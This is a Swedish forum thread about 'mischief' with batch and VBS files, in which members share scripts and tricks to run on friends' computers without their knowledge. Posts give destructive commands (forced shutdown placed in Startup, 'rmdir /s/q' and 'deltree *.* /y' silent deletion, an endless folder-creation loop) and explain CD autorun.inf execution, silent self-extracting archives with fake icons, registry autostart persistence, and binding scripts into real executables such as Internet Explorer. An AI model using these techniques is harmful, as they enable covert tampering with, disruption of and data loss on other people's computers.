Jävulskap & annat kul med .cmd/.bat filer

Permalänk
Medlem

shutdown -s -t 5 -c "YoU gOt A VirUZzzZz"
move "storande.bat" "H:\ntuserprofile\Start Menu\Programs\Startup\"

funkar denna endast till xp? isf hur kan man skriva för att få den att fungera till windows 2k?

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av OSkar000
deltree *.* /y

direkt i autoexec.bat funkade bra på dos-tiden Deltree verkar numera vara borttaget (xppro i skolan)

rmdir /s/q [path]

Tar bort mappen och alla undermappar/filer utan krav på bekräftelse i WinXP.

Permalänk
Medlem

Tänkte skicka en hel mapp med "roliga filer" jag hittat här till en kompis, min idé är att jag lurar honom att trycka på en .bat-fil(exempelvis) så att alla filer i mappen hamnar i Auto-start. Någon som vet hur jag gör detta enklast?

Visa signatur

PhII 955BE TRUE | Gigabyte 790FXT-UD5P | GTX 960 4GB | 16GB 1333MHz | Intel 330 120GB | 20TB | Corsair HX520 | Antec P182 | 27" BenQ VA | 2x 22" BenQ | 46" TV

Permalänk
Medlem

gör en bat fil som heter "start.bat" dra en quick batch compiler så den blir start.exe

skriv i bat filen:

copy "namn.bat/vbs" copy "%~0" %ALLUSERSPROFILE%\Autostart ------------------||--------------------------------------------------------- del "%~0"

då borde den först flytta alla filer sen ta bort sig själv..

med
------------------||---------------------------------------------------------
menar jag upprepa för varje fil..

Visa signatur

Citera så hittar jag tillbaks och kan ge svar.

Permalänk
Medlem

Tackar så mycket, ska start.exe ligga i samma mapp som filerna jag vill autostarta eller kan den ligga vart som helst?

Visa signatur

PhII 955BE TRUE | Gigabyte 790FXT-UD5P | GTX 960 4GB | 16GB 1333MHz | Intel 330 120GB | 20TB | Corsair HX520 | Antec P182 | 27" BenQ VA | 2x 22" BenQ | 46" TV

Permalänk

1 klistra denna
2 kan man göra så att mapparna på skrivbordet flyttar sig när man flyttar muspekaren mot dom så att dom blir omöjliga attöppna? typ set relative dist ir ngt?
3 kan man flyttaom kanpparna på tangentbordet så att alla knappar byter plats med varandra hela tiden random?

Visa signatur

"Ta det lungt jag är dyslektiker"

Permalänk
Medlem

1 Varför, ni håller den uppe ändå ^^
2 Nej.
3 Typ. Du behöver ett program som ligger igång i bakgrunden hela tiden, kolla lite på AutoHotKey det ska nog kunna göra det.

Permalänk
Medlem

@echo off cd C:\Documents and Settings\USER\Skrivbord :start set /a varnr= 1 :control if exist hej%varnr% goto hej_true if not exist hej%varnr% goto hej_false :hej_false md hej%varnr% goto end :hej_true set /a varnr=%varnr% + 1 goto control :end goto start

Byt ut USER mot användarens namn. Har glömt vad variabeln för användarnamnet var, skulle vara glad om någon kunde berätta?
Batch-filen kommer då skapa oändligt med mappar på skrivbordet.
Om du vill att den bara ska skapa en mapp åt gången är det bara att ta bort goto start.
Testas på egen risk

Btw, vad är dos-skriptet för "signal-fel" ?

Permalänk
Medlem

Hittade en Quick Batch Compiler som den kallades, men det var något virus inbakat i den, finns det andra alternativ?

Visa signatur

PhII 955BE TRUE | Gigabyte 790FXT-UD5P | GTX 960 4GB | 16GB 1333MHz | Intel 330 120GB | 20TB | Corsair HX520 | Antec P182 | 27" BenQ VA | 2x 22" BenQ | 46" TV

Permalänk

Har en ful liten ovana att hetsa folk på lan. Det är ju lite svårt att smyga in en bat fil och köra den på andras datorer, däremot är det få som har stängt av autostart på sin cd/dvd läsare. Man kan lätt smyga in en skiva i någons dator utan att dom märker något, ganska kul att se hur vissa reagerar då det poppar upp 200 notepad fönster

Iaf, så här gör du för att skapa autostart av en bat fil när du stoppar i skivan.

1. Skapa en fil autorun.inf och lägg in denna text i den

[AutoRun] open=aegd.bat icon=ikon.ico

2. Leta upp en rolig ikon, döp om den till ikon.ico.

3. Skapa en rolig bat fil och döp den till aegd.bat

4. Bränn ut alla dessa filer! Klart!

Har även utvecklat en gammal idé en hel del, någon kanske känner igen grundkonceptet lite
Tanka bigfile.exe och Filmnamn.DVDRiP.XViD-swec.bat, lägg dem i samma mapp och exekvera batfilen så skapas det en fejkfilm som bara tar upp ~15mb plats på hårddisken, medans t.ex. DC++ tror att den tar upp 700mb. Buslätt att bara ändra namn på filmen så har man en fin låtsas share att fula sig med
http://217.211.112.126/batch/

Detta fungerar bara om man använder filsystemet NTFS. Självklart att det ju ganska lätt att ta reda på att den är fake eller inte men det hör ju inte till saken...

Permalänk
Medlem

tja!
jag undrar bara om nån kan visa hur man skulle kunna göra så olika saker händer när man klickar på olika knappar i dem där vbs filerna med "msgbox"

t.ex. om man skulle ha:

while(true)
response = msgbox("Du har ätit för mkt chips, spring ett var runt huset och försök igen.", 1,"VARNING!")
wscript.sleep(5000)
wend

så skulle man kunna göra så att om man klickar på "ok" så skulle den göra en sak medans om man trycker på " avbryt" skulle den göra nåt annat

tror nog det kan vara lite kul o blanda ihop lite vbs script i en fil som man lägger i autostart och låta lan-polaren omedvetet besluta deras dators undergång ^^

Permalänk

Icon?

Någon som vet om man kan få bat filen att se ut som t.ex. Iexplorer... eller annat även på någon annans dator..

Hoppas att ni inte diskuterat det förut då jag inte läst igenom allt....

Mvh:André

Permalänk
Medlem

Nemo Orcus, Nemo: Borde väl gå att byta ikon och sedan ändra namn på filen antar jag?

Jerka123: Haha, väldigt intressant idé där:P

Visa signatur

PhII 955BE TRUE | Gigabyte 790FXT-UD5P | GTX 960 4GB | 16GB 1333MHz | Intel 330 120GB | 20TB | Corsair HX520 | Antec P182 | 27" BenQ VA | 2x 22" BenQ | 46" TV

Permalänk

Re: Icon?

Citat:

Ursprungligen inskrivet av Nemo Orcus,Nemo
Någon som vet om man kan få bat filen att se ut som t.ex. Iexplorer... eller annat även på någon annans dator..

Hoppas att ni inte diskuterat det förut då jag inte läst igenom allt....

Mvh:André

Ett lätt och bra sätt att göra det på är att göra en .rar fil av det du knåpat ihop. Men du ska göra den till .exe istället (med winrar t.ex. går det) Då kan du välja att ditt script ska starta automatiskt när det packats upp (som också sker automatiskt) och sen kopieras det till hemlig plats och .exe filen tas bort. På .exe filen kan du byta ikon lätt. Är lätt att lura någon med det. Är bra om du lägger filen på autostart i registret istället för den vanliga, eftersom det är väldigt lätt att ta bort annars. Har själv gjort ett par sånba här bus på LAN med kompisar Man kan t.ex. he på messenger tjänsten genom en .bat fil

Visa signatur

| i5 10600k@4,7 Ghz | AMD 6800 | 4Ghz RAM | 1 TB m.2 |

Permalänk
Medlem

Re: Icon?

Citat:

Ursprungligen inskrivet av Nemo Orcus,Nemo
Någon som vet om man kan få bat filen att se ut som t.ex. Iexplorer... eller annat även på någon annans dator..

Hoppas att ni inte diskuterat det förut då jag inte läst igenom allt....

Mvh:André

Det går inte att byta ikon på batfilen i sig vad jag har förstått, men annars kan du ju göra en genväg till den och byta ikon på genvägen.

Visa signatur

Desktop|i5 3570k(@4,4GHz)|Asus P8Z77-V|AMD 6950|12GB RAM|Crucial BX500 480GB|Manjaro|
Laptop|Lenovo T440s|i7|8GB RAM|Debian Jessie|
Server|Fujitsu Primergy TX1310|G1820|8GB RAM|15TB|Unraid|
Ring, lånad mail

Permalänk
Medlem

Nu tänkte jag ge ett tips till de som vill att användaren ska öppna filen ni skapat. Jag själv har haft problemet att vänskapskretsen början undvika att starta .vbs och liknande.

Markera den/de filerna ni vill ska bli till en .exe fil med valfri ikon. Högerklicka på dessa när ni markerat dem och välj "Add to Archive...", denna funktion förutsätter att programmet WinRar är installerat.

Nu på första fliken "General" finns en val möjlighet som heter "Create SFX archive", klicka i denna. Gå nu till fliken "Advanced" och tryck på knappen "SFX options" som finns till höger. Här följer du bara instruktioner, hur filen ska packas upp och var den ska sparas. Under C:\Windows\ etc. Välj även vilken fil som ska startas efter uppackning! Under fliken "Modes" bör du välja "Hide All" under Silent Mode, om denna inte är ikryssad kommer det dyka upp en dialog, vi vill ju att allt ska köras utan att det syns. Under fliken "Text and icon" kan en läplig icon väljas.

Ett bra sätt om man vill lura någon,

Lycka till!

mvh
Johan

Permalänk

...

Ursäkta jag kan tämligen lite om programering även om jag innehar en c++ variant... Men vad är skilnaden i programeringen i en bat och en exe fil...?

Har använt mig av:

Start IEXPLORE.exe www......

Men det funkade inte att bara döpa om denna fil (till exe från bat) så om någon har tid och lust så förklara gjärna. Jag skulle även vilja tacka Kaptenperre som verkar ha hålt på med liknande saker även om något grövre...

//André

Permalänk
Medlem

Re: ...

Citat:

Ursprungligen inskrivet av Nemo Orcus,Nemo
så om någon har tid och lust så förklara gjärna.
//André

Du får gärna läsa inlägget innan ditt eget där jag gav en lösning på hur man gör en .bat fil etc till en .exe!

Mvh
Johan

Permalänk
Medlem

Kan man göra om en batch-fil till en exekverbar fil (EXE) ?
Provade Quick Batch File compiler som olol skrev, men då reagerade mitt antivirus.

Permalänk
Medlem

Samma här med Quick Batch Compiler, alla antivirus-larm gick igång o blockerade skiten.

Visa signatur

PhII 955BE TRUE | Gigabyte 790FXT-UD5P | GTX 960 4GB | 16GB 1333MHz | Intel 330 120GB | 20TB | Corsair HX520 | Antec P182 | 27" BenQ VA | 2x 22" BenQ | 46" TV

Permalänk

Ivarsk pratade tidigare omen variabel för användaren
"C:/Document and Settings/"
//André

Permalänk
Medlem

Re: Icon?

Citat:

Ursprungligen inskrivet av Nemo Orcus,Nemo
Någon som vet om man kan få bat filen att se ut som t.ex. Iexplorer... eller annat även på någon annans dator..

Hoppas att ni inte diskuterat det förut då jag inte läst igenom allt....

Mvh:André

microjoiner är prima om man ska göra om filer till .exe (du kan även byta ikon), där kan man även baka in flera saker... så man kan tex baka in sin lilla .bat fil i den "riktiga" Iexplorer .exefilen så att varje gång han öppnar IE så öppnas det som vanligt men även den lilla .bat fil dom du bakat in

EDIT: vi mixtrade med en snubbes wc3.exe fil så att varje gång han öppnade den så öppnades en webbradio i bakgrunden med jättestörande musik
Dock så tror jag nu när jag tänker efter så klassas microjoiner som ett "hackingverktyg" och tas bort av många virusprogram tyvärr =/

Permalänk
Medlem

André(Nemo): Ja, jag pratade om det fanns en variabel för användaren, men vad ville du komma till?

Permalänk
Medlem

Re: Re: Icon?

Citat:

Ursprungligen inskrivet av Applet
microjoiner är prima om man ska göra om filer till .exe (du kan även byta ikon), där kan man även baka in flera saker... så man kan tex baka in sin lilla .bat fil i den "riktiga" Iexplorer .exefilen så att varje gång han öppnar IE så öppnas det som vanligt men även den lilla .bat fil dom du bakat in

EDIT: vi mixtrade med en snubbes wc3.exe fil så att varje gång han öppnade den så öppnades en webbradio i bakgrunden med jättestörande musik
Dock så tror jag nu när jag tänker efter så klassas microjoiner som ett "hackingverktyg" och tas bort av många virusprogram tyvärr =/

Japp, eftersom program som detta brukar man använda för att ta sig runt windowsbrandväggar eller för att skicka virus.

Varför vill så många ha script-kiddie kunskaper?

Visa signatur

Plan9 fan. In glenda we trust.

Permalänk

Re: Re: Re: Icon?

Citat:

Ursprungligen inskrivet av dagle
Japp, eftersom program som detta brukar man använda för att ta sig runt windowsbrandväggar eller för att skicka virus.

Varför vill så många ha script-kiddie kunskaper?

Eftersom att det är grymt roligt att skämta med kompisar på LAN t.ex.

Visa signatur

| i5 10600k@4,7 Ghz | AMD 6800 | 4Ghz RAM | 1 TB m.2 |

Permalänk
Medlem

Re: Re: Re: Icon?

Citat:

Ursprungligen inskrivet av dagle
Japp, eftersom program som detta brukar man använda för att ta sig runt windowsbrandväggar eller för att skicka virus.

Varför vill så många ha script-kiddie kunskaper?

Så det är inget farligt fastän antiviruset reagerar?

Och om man nu skulle skapa något i DOS och göra om det till en exekverbar fil så är man nog inte direkt en script-kiddie ;D

Permalänk
Medlem

Re: Re: Re: Re: Icon?

Citat:

Ursprungligen inskrivet av Ivarska
Så det är inget farligt fastän antiviruset reagerar?

Och om man nu skulle skapa något i DOS och göra om det till en exekverbar fil så är man nog inte direkt en script-kiddie ;D

Farligt.. Skulle inte lita på det programmet, testa att köra programmet i en säker miljö.
Om man gör om en batfil till exe så är man fortfarande script-kiddie.

Visa signatur

Plan9 fan. In glenda we trust.

Permalänk
Medlem

Re: ...

Citat:

Ursprungligen inskrivet av Nemo Orcus,Nemo
Ursäkta jag kan tämligen lite om programering även om jag innehar en c++ variant... Men vad är skilnaden i programeringen i en bat och en exe fil...?

Har använt mig av:

Start IEXPLORE.exe www......

Men det funkade inte att bara döpa om denna fil (till exe från bat) så om någon har tid och lust så förklara gjärna. Jag skulle även vilja tacka Kaptenperre som verkar ha hålt på med liknande saker även om något grövre...

//André

Skillnaden är att .exe filer är kompilerade och är ett dataflöde som skickas till cpun direkt.
.bat filer kör windowskommandon och är bara vanlig text.

På nästa lan ska jag lägga in en mp3 fil i mina kompisars Taunts mapp i AoE II. Som ska hete 666 - TINITUS.mp3. så skriver man 666 i chatten så spelas ljudet upp (låter exakt som om man fått tinitus

Permalänk
Medlem

Kan man via en bat- eller batchfil döda processer?

Visa signatur

Rasmus Lindell
Webmaster

Permalänk
Citat:

Ursprungligen inskrivet av Rüllen
Kan man via en bat- eller batchfil döda processer?

taskkill /?